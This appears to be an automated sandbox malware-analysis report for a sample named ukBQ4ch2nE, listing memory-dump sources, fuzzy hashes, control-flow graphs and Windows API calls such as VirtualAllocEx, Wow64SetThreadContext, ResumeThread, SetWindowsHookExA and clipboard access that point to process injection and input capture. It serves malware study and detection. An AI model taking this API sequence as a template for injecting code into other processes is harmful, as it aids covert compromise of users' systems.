                                                        • Instruction Fuzzy Hash: 292139B1C0024D9FDB10CFAAC840AEEFBF5FF48320F108429E919A7250D7799940DBA4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 630 58791a0-58791eb 632 58791ed-58791f9 630->632 633 58791fb-587922b Wow64SetThreadContext 630->633 632->633 636 5879234-5879264 633->636 637 587922d-5879233 633->637 637->636
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0587921E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: ff6f26cb5d48c920486ec22008a7b6d39efe9bfd3586f971e16e4feccefad471
                                                        • Instruction ID: 64b502270c3b04f192001b5a12ee254dcbc992d8275ff61e4faccbb29541e82b
                                                        • Opcode Fuzzy Hash: ff6f26cb5d48c920486ec22008a7b6d39efe9bfd3586f971e16e4feccefad471
                                                        • Instruction Fuzzy Hash: FB214971D002098FDB10DFAAC485BEEBBF4FF48324F148429D459A7240DB789944CFA4
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0316D54E,?,?,?,?,?), ref: 0316D60F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 1c2062ffd85bcb9bfca5a413e8942e067b44f6dac30f6b408dd37d279551ba7b
                                                        • Instruction ID: 476a476b8bf893ed48a1957d05f1cdfe1b150a9cd390e0199c9828c8f1726313
                                                        • Opcode Fuzzy Hash: 1c2062ffd85bcb9bfca5a413e8942e067b44f6dac30f6b408dd37d279551ba7b
                                                        • Instruction Fuzzy Hash: 2D21F3B5D00248DFDB10CF99E584ADEBBF4EB48320F14845AE818A7310D379AA50CF65
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 058792E6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: ee586d26a9a891083575f47019352c7c4e1904e38987953bc8275d3497d5613d
                                                        • Instruction ID: 0a038671279ce3910b4cfa8b6965944beb63f41a52ec098406561e6c01c667bd
                                                        • Opcode Fuzzy Hash: ee586d26a9a891083575f47019352c7c4e1904e38987953bc8275d3497d5613d
                                                        • Instruction Fuzzy Hash: B51137719002499FDB10DFAAC844ADFBFF5EF88320F148819E529A7250DB759940CFA4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: a69e247e4c6fd7bb766c130bad10294aab905e7e0c3984979662b48d02f44f1f
                                                        • Instruction ID: e7aa6315bc305c61928737f5d9d77c86d3fbf603022996d9b8214a898e1e8620
                                                        • Opcode Fuzzy Hash: a69e247e4c6fd7bb766c130bad10294aab905e7e0c3984979662b48d02f44f1f
                                                        • Instruction Fuzzy Hash: 171128B1D002488FDB20DFAAC84579EFBF9EB98324F248419D519A7240DA79A944CBA4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 77276e62ab3dae9f3d483594268229a3868136f3d5c36fcbddf86b116a15dd82
                                                        • Instruction ID: 0506d2a91add372ff9114e08d1eb62f52f628ac9efa770fd7abe307700bdf66a
                                                        • Opcode Fuzzy Hash: 77276e62ab3dae9f3d483594268229a3868136f3d5c36fcbddf86b116a15dd82
                                                        • Instruction Fuzzy Hash: 28113AB1D002488FDB20DFAAC4457DFFBF9EF88324F248419D519A7240DB79A944CBA4
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0316B306
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: cf0d8977389e5dbf02ce3ee8845a6050fbaf93e135d6746ef1f38874b125e8bb
                                                        • Instruction ID: 86f7e45e390bbf2f9ca396f1d8358c62cc9774e784feacf3ac0fd975ed50e2c0
                                                        • Opcode Fuzzy Hash: cf0d8977389e5dbf02ce3ee8845a6050fbaf93e135d6746ef1f38874b125e8bb
                                                        • Instruction Fuzzy Hash: 7611E0B5D006498FCB20CF9AC444ADEFBF8EF88320F14852AD469B7210D379A545CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578153715.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_17ad000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06ca163f7d4eefbc831ac8c3b0a3dbd401afc627d2843bdc514e7e3fdddf2df7
                                                        • Instruction ID: 2d21f2db5274e4bcf7caf3fc78098085002c55d66ac3f381f6f929c4b27fdd51
                                                        • Opcode Fuzzy Hash: 06ca163f7d4eefbc831ac8c3b0a3dbd401afc627d2843bdc514e7e3fdddf2df7
                                                        • Instruction Fuzzy Hash: CC2136B1500200DFDB21DF88C9C0B56FF65FBC8314F64C6A8ED090B656C336E406CAA2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578195247.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_17bd000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a2524e3ca2786a9cc64dba9d31546b0ba553aebe46fc4d9a7239c9f7e8bcdf0
                                                        • Instruction ID: a5d6fcf27ed24bd0c49101888612eec8641fcffab0ea0faa339814aa2645633c
                                                        • Opcode Fuzzy Hash: 5a2524e3ca2786a9cc64dba9d31546b0ba553aebe46fc4d9a7239c9f7e8bcdf0
                                                        • Instruction Fuzzy Hash: C0213771604200DFDB25DF98D5C0B56FFA5FB88318F24C5ADE9094B246C33AD407CA61
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578153715.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_17ad000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                        • Instruction ID: 00a0314d983c4e7a33482a5bdbc943e2d0bdb8c48e8d9e3c65080e4da7dc911e
                                                        • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                        • Instruction Fuzzy Hash: 1411CD76404280CFDB12CF44D5C4B56BF62FB84224F2482A9DD090B656C33AE45ACBA1
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578195247.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_17bd000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                        • Instruction ID: f96edb47a6fce16961c4615d787f6b8a138835b02d731aa5deb1e290b3ae5d97
                                                        • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                                                        • Instruction Fuzzy Hash: 9511D075504280CFDB22CF54D5C4B55FF61FB44318F24C6A9D8094B656C33AD40ACB61
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72e9fe17a645df81768efd4556d2519be98c4a4a3ef2cd7ba18a3564de8a71e3
                                                        • Instruction ID: c1a430879bca3d8da2d6754c0c2d70706066b7830eb4a4c8ec79cbb50ff347ed
                                                        • Opcode Fuzzy Hash: 72e9fe17a645df81768efd4556d2519be98c4a4a3ef2cd7ba18a3564de8a71e3
                                                        • Instruction Fuzzy Hash: 451265F18017468AE710EF65F94C289BBB1FB46318FB0C609D2656F2E9DBB8154ACF44
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1578943639.0000000003160000.00000040.00000800.00020000.00000000.sdmp, Offset: 03160000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_3160000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b01b85e3f3e56c69e24c02b041574468fb8eca4934bd3ba8388705e237f1c070
                                                        • Instruction ID: 0fed0c0aa5569a0968c858842297e6909e9495294ae1aba01391c801b184e1d8
                                                        • Opcode Fuzzy Hash: b01b85e3f3e56c69e24c02b041574468fb8eca4934bd3ba8388705e237f1c070
                                                        • Instruction Fuzzy Hash: 3FA19F36E003198FCF05DFB5D85449EB7B6FF88300B1585AAE805AF265DB71E966CB80
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1580323657.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_5870000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a9b5011094bbafbbbee568091527629aa9d235fd06e923c6d693b95541d8c66
                                                        • Instruction ID: 9201c149d51e31ff87a62443ba57b8e209fb0d29038796377787be9a332d97d9
                                                        • Opcode Fuzzy Hash: 7a9b5011094bbafbbbee568091527629aa9d235fd06e923c6d693b95541d8c66
                                                        • Instruction Fuzzy Hash: 4CC1F5B08017468FE710EF69F94C289BBB1FB86324F758219D1616F2E9DBB8144ACF44

                                                        Execution Graph

                                                        Execution Coverage:13.5%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:173
                                                        Total number of Limit Nodes:16
                                                        execution_graph 40473 b98068 40474 b980ae DeleteFileW 40473->40474 40476 b980e7 40474->40476 40477 b90848 40479 b9084e 40477->40479 40478 b9091b 40479->40478 40482 b9147f 40479->40482 40492 b91350 40479->40492 40484 b91366 40482->40484 40485 b91483 40482->40485 40483 b9147a 40483->40479 40484->40483 40488 b9147f 6 API calls 40484->40488 40502 65e03c8 40484->40502 40510 65e03b8 40484->40510 40518 b98119 40484->40518 40522 b98128 40484->40522 40526 b98829 40484->40526 40485->40479 40488->40484 40494 b9135f 40492->40494 40495 b91283 40492->40495 40493 b9147a 40493->40479 40494->40493 40496 b9147f 6 API calls 40494->40496 40497 b98119 MoveFileA 40494->40497 40498 b98128 MoveFileA 40494->40498 40499 b98829 2 API calls 40494->40499 40500 65e03c8 3 API calls 40494->40500 40501 65e03b8 3 API calls 40494->40501 40495->40479 40496->40494 40497->40494 40498->40494 40499->40494 40500->40494 40501->40494 40503 65e03da 40502->40503 40505 65e048b 40503->40505 40531 65e09d8 40503->40531 40536 65e0a10 40503->40536 40505->40484 40511 65e03c8 40510->40511 40513 65e048b 40511->40513 40514 65e09d8 2 API calls 40511->40514 40515 65e0a10 2 API calls 40511->40515 40512 65e0451 40516 65e8218 KiUserCallbackDispatcher 40512->40516 40517 65e8228 KiUserCallbackDispatcher 40512->40517 40513->40484 40514->40512 40515->40512 40516->40513 40517->40513 40520 b98147 40518->40520 40519 b98202 40519->40484 40520->40519 40593 b97800 40520->40593 40524 b98147 40522->40524 40523 b98202 40523->40484 40524->40523 40525 b97800 MoveFileA 40524->40525 40525->40523 40527 b98833 40526->40527 40528 b988e9 40527->40528 40597 663f5c8 40527->40597 40602 663f5b8 40527->40602 40528->40484 40532 65e09dd 40531->40532 40549 65e1588 40532->40549 40558 65e1573 40532->40558 40537 65e0a1d 40536->40537 40539 65e1588 2 API calls 40537->40539 40540 65e1573 2 API calls 40537->40540 40538 65e0451 40541 65e8218 40538->40541 40545 65e8228 40538->40545 40539->40538 40540->40538 40542 65e8230 40541->40542 40544 65e8253 40542->40544 40589 65e6cec 40542->40589 40544->40505 40546 65e8230 40545->40546 40547 65e6cec KiUserCallbackDispatcher 40546->40547 40548 65e8253 40546->40548 40547->40546 40548->40505 40550 65e15b3 40549->40550 40567 65e0994 40550->40567 40553 65e1636 40555 65e1662 40553->40555 40575 65e09a4 40553->40575 40557 65e0994 2 API calls 40557->40553 40559 65e15b3 40558->40559 40560 65e0994 2 API calls 40559->40560 40561 65e161a 40560->40561 40565 65e1a58 2 API calls 40561->40565 40566 65e0994 2 API calls 40561->40566 40562 65e1636 40563 65e09a4 GetModuleHandleW 40562->40563 40564 65e1662 40562->40564 40563->40564 40565->40562 40566->40562 40568 65e099f 40567->40568 40569 65e161a 40568->40569 40579 65e20d7 40568->40579 40569->40557 40571 65e1a58 40569->40571 40572 65e1a67 40571->40572 40573 65e1a73 40572->40573 40574 65e20d7 2 API calls 40572->40574 40573->40553 40574->40573 40576 65e23b0 GetModuleHandleW 40575->40576 40578 65e2425 40576->40578 40578->40555 40580 65e20e2 40579->40580 40581 65e09a4 GetModuleHandleW 40580->40581 40582 65e2202 40581->40582 40583 65e09a4 GetModuleHandleW 40582->40583 40588 65e227c 40582->40588 40584 65e2250 40583->40584 40586 65e09a4 GetModuleHandleW 40584->40586 40584->40588 40585 65e23f8 GetModuleHandleW 40587 65e2425 40585->40587 40586->40588 40587->40569 40588->40569 40588->40585 40590 65e8268 KiUserCallbackDispatcher 40589->40590 40592 65e82d6 40590->40592 40592->40542 40594 b98640 MoveFileA 40593->40594 40596 b986df 40594->40596 40596->40519 40598 663f5dd 40597->40598 40599 663f7f2 40598->40599 40600 663f809 GlobalMemoryStatusEx GlobalMemoryStatusEx 40598->40600 40601 663fa6c GlobalMemoryStatusEx GlobalMemoryStatusEx 40598->40601 40599->40528 40600->40598 40601->40598 40604 663f5c8 40602->40604 40603 663f7f2 40603->40528 40604->40603 40605 663f809 GlobalMemoryStatusEx GlobalMemoryStatusEx 40604->40605 40606 663fa6c GlobalMemoryStatusEx GlobalMemoryStatusEx 40604->40606 40605->40604 40606->40604 40405 b4d030 40406 b4d048 40405->40406 40407 b4d0a2 40406->40407 40413 65e1d4c 40406->40413 40421 65e3600 40406->40421 40425 65e3610 40406->40425 40429 65e3662 40406->40429 40434 65e7c72 40406->40434 40414 65e1d57 40413->40414 40415 65e7d01 40414->40415 40417 65e7cf1 40414->40417 40450 65e6c94 40415->40450 40442 65e7e18 40417->40442 40446 65e7e28 40417->40446 40418 65e7cff 40418->40418 40422 65e3610 40421->40422 40423 65e1d4c CallWindowProcW 40422->40423 40424 65e3657 40423->40424 40424->40407 40426 65e3636 40425->40426 40427 65e1d4c CallWindowProcW 40426->40427 40428 65e3657 40427->40428 40428->40407 40430 65e366a 40429->40430 40431 65e3634 40429->40431 40432 65e1d4c CallWindowProcW 40431->40432 40433 65e3657 40432->40433 40433->40407 40435 65e7c7a 40434->40435 40435->40407 40436 65e7d01 40435->40436 40438 65e7cf1 40435->40438 40437 65e6c94 CallWindowProcW 40436->40437 40439 65e7cff 40437->40439 40440 65e7e18 CallWindowProcW 40438->40440 40441 65e7e28 CallWindowProcW 40438->40441 40439->40439 40440->40439 40441->40439 40445 65e7e36 40442->40445 40443 65e6c94 CallWindowProcW 40443->40445 40444 65e7f0e 40444->40418 40445->40443 40445->40444 40448 65e7e36 40446->40448 40447 65e6c94 CallWindowProcW 40447->40448 40448->40447 40449 65e7f0e 40448->40449 40449->40418 40451 65e6c99 40450->40451 40452 65e7f71 40451->40452 40453 65e7fc2 CallWindowProcW 40451->40453 40452->40418 40453->40452 40454 65e3458 40455 65e34c0 CreateWindowExW 40454->40455 40457 65e357c 40455->40457 40457->40457 40458 65e8c78 40459 65e8cd2 OleGetClipboard 40458->40459 40460 65e8d12 40459->40460 40461 65e7098 DuplicateHandle 40462 65e712e 40461->40462 40607 65ea8c8 40608 65ea90c SetWindowsHookExA 40607->40608 40610 65ea952 40608->40610 40463 65e6e50 40464 65e6e51 GetCurrentProcess 40463->40464 40466 65e6ee8 GetCurrentThread 40464->40466 40467 65e6ee1 40464->40467 40468 65e6f1e 40466->40468 40469 65e6f25 GetCurrentProcess 40466->40469 40467->40466 40468->40469 40470 65e6f5b 40469->40470 40471 65e6f83 GetCurrentThreadId 40470->40471 40472 65e6fb4 40471->40472 40611 65e8ae0 40612 65e8aeb 40611->40612 40613 65e8afb 40612->40613 40615 65e6e34 40612->40615 40616 65e8b30 OleInitialize 40615->40616 40617 65e8b94 40616->40617 40617->40613

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 125 66330a8-66330c9 126 66330cb-66330ce 125->126 127 66330d0-66330ef 126->127 128 66330f4-66330f7 126->128 127->128 129 6633898-663389a 128->129 130 66330fd-663311c 128->130 131 66338a1-66338a4 129->131 132 663389c 129->132 138 6633135-663313f 130->138 139 663311e-6633121 130->139 131->126 134 66338aa-66338b3 131->134 132->131 143 6633145-6633154 138->143 139->138 140 6633123-6633133 139->140 140->143 251 6633156 call 66338c0 143->251 252 6633156 call 66338c8 143->252 144 663315b-6633160 145 6633162-6633168 144->145 146 663316d-663344a 144->146 145->134 167 6633450-66334ff 146->167 168 663388a-6633897 146->168 177 6633501-6633526 167->177 178 6633528 167->178 180 6633531-6633544 177->180 178->180 182 6633871-663387d 180->182 183 663354a-663356c 180->183 182->167 184 6633883 182->184 183->182 186 6633572-663357c 183->186 184->168 186->182 187 6633582-663358d 186->187 187->182 188 6633593-6633669 187->188 200 6633677-66336a7 188->200 201 663366b-663366d 188->201 205 66336b5-66336c1 200->205 206 66336a9-66336ab 200->206 201->200 207 66336c3-66336c7 205->207 208 6633721-6633725 205->208 206->205 207->208 211 66336c9-66336f3 207->211 209 6633862-663386b 208->209 210 663372b-6633767 208->210 209->182 209->188 221 6633775-6633783 210->221 222 6633769-663376b 210->222 218 6633701-663371e 211->218 219 66336f5-66336f7 211->219 218->208 219->218 225 6633785-6633790 221->225 226 663379a-66337a5 221->226 222->221 225->226 229 6633792 225->229 230 66337a7-66337ad 226->230 231 66337bd-66337ce 226->231 229->226 232 66337b1-66337b3 230->232 233 66337af 230->233 235 66337d0-66337d6 231->235 236 66337e6-66337f2 231->236 232->231 233->231 237 66337da-66337dc 235->237 238 66337d8 235->238 240 66337f4-66337fa 236->240 241 663380a-663385b 236->241 237->236 238->236 242 66337fe-6633800 240->242 243 66337fc 240->243 241->209 242->241 243->241 251->144 252->144
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-220072568
                                                        • Opcode ID: 2ebb74838bb396cdf1f269495a412cd403bf728e55f48d045e354464a4634633
                                                        • Instruction ID: cabdbe758fe019c93f69eebe56905576cd9030eea594f16f7b09d8065aca9edd
                                                        • Opcode Fuzzy Hash: 2ebb74838bb396cdf1f269495a412cd403bf728e55f48d045e354464a4634633
                                                        • Instruction Fuzzy Hash: 9C320C30E1065A8FCB55EF75C99459EF7B2FF89300F5086A9D449AB364EF30A985CB80

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 673 66379c8-66379e6 674 66379e8-66379eb 673->674 675 66379f8-66379fb 674->675 676 66379ed-66379f7 674->676 677 6637a1e-6637a21 675->677 678 66379fd-6637a19 675->678 679 6637a23-6637a3d 677->679 680 6637a42-6637a45 677->680 678->677 679->680 681 6637a47-6637a55 680->681 682 6637a5c-6637a5e 680->682 688 6637a6e-6637a84 681->688 690 6637a57 681->690 684 6637a60 682->684 685 6637a65-6637a68 682->685 684->685 685->674 685->688 693 6637a8a-6637a93 688->693 694 6637c9f-6637ca9 688->694 690->682 695 6637caa-6637cdf 693->695 696 6637a99-6637ab6 693->696 703 6637ce1-6637ce4 695->703 701 6637c8c-6637c99 696->701 702 6637abc-6637ae4 696->702 701->693 701->694 702->701 721 6637aea-6637af3 702->721 704 6637d97-6637d9a 703->704 705 6637cea-6637cf6 703->705 707 6637da0-6637daf 704->707 708 6637fc6-6637fc9 704->708 711 6637d01-6637d03 705->711 718 6637db1-6637dcc 707->718 719 6637dce-6637e09 707->719 709 6637fcb-6637fe7 708->709 710 6637fec-6637fee 708->710 709->710 713 6637ff0 710->713 714 6637ff5-6637ff8 710->714 715 6637d05-6637d0b 711->715 716 6637d1b-6637d22 711->716 713->714 714->703 722 6637ffe-6638007 714->722 723 6637d0f-6637d11 715->723 724 6637d0d 715->724 725 6637d33 716->725 726 6637d24-6637d31 716->726 718->719 734 6637f9a-6637fb0 719->734 735 6637e0f-6637e20 719->735 721->695 728 6637af9-6637b15 721->728 723->716 724->716 727 6637d38-6637d3a 725->727 726->727 729 6637d51-6637d8a 727->729 730 6637d3c-6637d3f 727->730 740 6637b1b-6637b45 728->740 741 6637c7a-6637c86 728->741 729->707 758 6637d8c-6637d96 729->758 730->722 734->708 745 6637e26-6637e43 735->745 746 6637f85-6637f94 735->746 756 6637c70-6637c75 740->756 757 6637b4b-6637b73 740->757 741->701 741->721 745->746 755 6637e49-6637f3f call 66361e8 745->755 746->734 746->735 807 6637f41-6637f4b 755->807 808 6637f4d 755->808 756->741 757->756 764 6637b79-6637ba7 757->764 764->756 770 6637bad-6637bb6 764->770 770->756 771 6637bbc-6637bee 770->771 779 6637bf0-6637bf4 771->779 780 6637bf9-6637c15 771->780 779->756 781 6637bf6 779->781 780->741 782 6637c17-6637c6e call 66361e8 780->782 781->780 782->741 809 6637f52-6637f54 807->809 808->809 809->746 810 6637f56-6637f5b 809->810 811 6637f69 810->811 812 6637f5d-6637f67 810->812 813 6637f6e-6637f70 811->813 812->813 813->746 814 6637f72-6637f7e 813->814 814->746
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq
                                                        • API String ID: 0-2246304398
                                                        • Opcode ID: 6fdbf48f69b33beee54cc2e079b269cd5393a8c9861e30598ed4eef0e828ce53
                                                        • Instruction ID: 45e6aa9cbb3735f136bcb02b6f046c2d8ec7ebb23c89cd92c563ad2dc088c40b
                                                        • Opcode Fuzzy Hash: 6fdbf48f69b33beee54cc2e079b269cd5393a8c9861e30598ed4eef0e828ce53
                                                        • Instruction Fuzzy Hash: 09029F70B002259FDB54DB75D9946AEBBE2FF84300F248569E406DB395EB31ED82CB84

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 816 663591b-6635940 817 6635942-6635945 816->817 818 6635947-663594d 817->818 819 6635954-6635957 817->819 820 6635959-6635978 818->820 821 663594f 818->821 819->820 822 663598e-6635991 819->822 837 663597a 820->837 838 663597d-6635983 820->838 821->819 823 6635993-6635998 822->823 824 66359af-66359b2 822->824 825 663599a 823->825 826 663599d-66359aa 823->826 827 66359b4-66359b6 824->827 828 66359bb-66359be 824->828 825->826 826->824 827->828 828->818 830 66359c0-66359c3 828->830 832 66359c5-66359c7 830->832 833 66359ca-66359cc 830->833 832->833 835 66359d3-66359d6 833->835 836 66359ce 833->836 835->817 839 66359dc-66359e4 835->839 836->835 837->838 840 66359e5-6635a22 838->840 841 6635985-6635989 838->841 843 6635a24-6635a27 840->843 841->822 844 6635a35-6635a38 843->844 845 6635a29-6635a32 843->845 846 6635a3a-6635a41 844->846 847 6635a48-6635a4b 844->847 848 6635a43 846->848 849 6635a51-6635a58 846->849 847->849 850 6635bc5-6635bc8 847->850 848->847 853 6635ba6-6635bb9 849->853 854 6635a5e-6635aa5 849->854 851 6635bca-6635bd8 850->851 852 6635bdd-6635be0 850->852 851->852 855 6635be2-6635bf7 852->855 856 6635bfc-6635bfe 852->856 869 6635aa7-6635ab6 854->869 855->856 860 6635c00 856->860 861 6635c05-6635c08 856->861 860->861 861->843 862 6635c0e-6635c18 861->862 871 6635c1b-6635c5a 869->871 872 6635abc-6635ad2 869->872 875 6635c5c-6635c5f 871->875 872->871 876 6635ad8-6635ae0 872->876 878 6635c72-6635c75 875->878 879 6635c61-6635c6d 875->879 876->869 877 6635ae2-6635ae8 876->877 882 6635aea-6635aed 877->882 883 6635b48-6635b98 call 6634728 877->883 880 6635c77-6635c84 878->880 881 6635c89-6635c8c 878->881 879->878 880->881 884 6635ca4-6635ca7 881->884 885 6635c8e-6635ca1 881->885 882->871 886 6635af3-6635afe 882->886 930 6635ba3 883->930 931 6635b9a 883->931 891 6635cbb-6635cbe 884->891 892 6635ca9-6635cb0 884->892 886->871 890 6635b04-6635b0e 886->890 890->871 898 6635b14-6635b1e 890->898 895 6635cd1-6635cd4 891->895 896 6635cc0-6635ccc 891->896 893 6635d56-6635d5d 892->893 894 6635cb6 892->894 893->885 902 6635d63-6635dce 893->902 894->891 900 6635cd6-6635ce7 895->900 901 6635cec-6635cef 895->901 896->895 898->871 903 6635b24-6635b39 898->903 900->901 905 6635cf1-6635d10 901->905 906 6635d30-6635d33 901->906 937 6635dd7-6635dde 902->937 903->871 907 6635b3f-6635b46 903->907 924 6635e0c-6635e16 905->924 908 6635d35-6635d48 906->908 909 6635d4d-6635d50 906->909 907->882 907->883 908->909 909->893 913 6635de1-6635de4 909->913 917 6635de6-6635df5 913->917 918 6635dfa-6635dfc 913->918 917->918 922 6635e03-6635e06 918->922 923 6635dfe 918->923 922->875 922->924 923->922 930->853 931->930
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: XPjq$\Ojq
                                                        • API String ID: 0-3813800045
                                                        • Opcode ID: 11b1f8a370e78cc5d211acdb02fb82a73ae747c8ce7ff3512fb899e2b0809dfc
                                                        • Instruction ID: 2477837c242d8e5d238041a85643cbcad1e414ca3ae58466ffc824623d525d5e
                                                        • Opcode Fuzzy Hash: 11b1f8a370e78cc5d211acdb02fb82a73ae747c8ce7ff3512fb899e2b0809dfc
                                                        • Instruction Fuzzy Hash: 5AE1F371B101648FDB54DB68D494AAEBBF2FF89320F2584AAE407DB391CA30DC45C790
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 3f6946c6d863ec61f477c5cb697dfa328f6119b3c82cc1318c93abdcec11b296
                                                        • Instruction ID: 88f0c3b70fab987ce235f135f64ca6ee777ad3b703171967dfe58440bb162b3d
                                                        • Opcode Fuzzy Hash: 3f6946c6d863ec61f477c5cb697dfa328f6119b3c82cc1318c93abdcec11b296
